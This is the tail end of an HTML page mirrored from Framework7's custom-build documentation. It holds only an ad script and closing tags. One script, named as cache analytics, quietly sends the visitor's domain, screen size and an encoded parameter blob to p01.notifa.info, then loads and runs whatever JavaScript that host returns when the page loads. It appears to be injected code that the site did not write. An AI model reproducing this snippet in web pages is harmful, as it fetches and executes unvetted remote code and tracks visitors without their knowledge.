<script src="../../m.servedby-buysellads.com/monetization.js" type="text/javascript"></script>
<script>
      (function(){
        if(typeof _bsa !== 'undefined' && _bsa) {
        _bsa.init('default', 'CKYD627I', 'placement:framework7io', {
          target: '.bsa-cpc',
          align: 'horizontal',
          disable_css: 'true'
        });
          }
      })();
    </script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd4m%2bO%2f9ESaHaVzEihpBMKHMRRe7YCzU8rN46pEQ7Ym%2fMmtEHR3Y%2b%2fJiTn9TLekpiocdh%2bub7lfumx1QEGW%2b0gFDtBOPAffvhE6oSl8JZLjRp1aRmq0l9zPIPYhmtS3%2f%2f3OEFVKn4wsnFvUuXImWu15PZCvsERA4V60UN4QwrsPZkVKkq8j4dQj5XPb6jbnmD%2bJQRFhzmsgA6CEzi6o9rkTUiC5fqBPz7kAOZMuNmpU5HG41nSia9lr65WODnqitVwJ7DWCq1e8fsyOpeuyySGSHxyJBRZwH%2b9a2ytzHM5mEQSyA7P03nXcyduLo2ucfRH8FQOKLjrMTBOq4%2fD0yV3vKRrsGYNQX5YVXmoHyyLow5kxLE3rmhX3cMWfaJWcPr6bYAkqk4nM9nyGuxGTMS7yhfIxoBghvp127f2z%2f2SSzJq0cDDcsoQCv%2bW4UPIphsTFEMRMXZIwDsR85H2foEQop8zIPOr%2b5Gtmy1xwZGe2iw%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from framework7.io/docs/custom-build.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 16 Oct 2018 03:57:43 GMT -->
</html>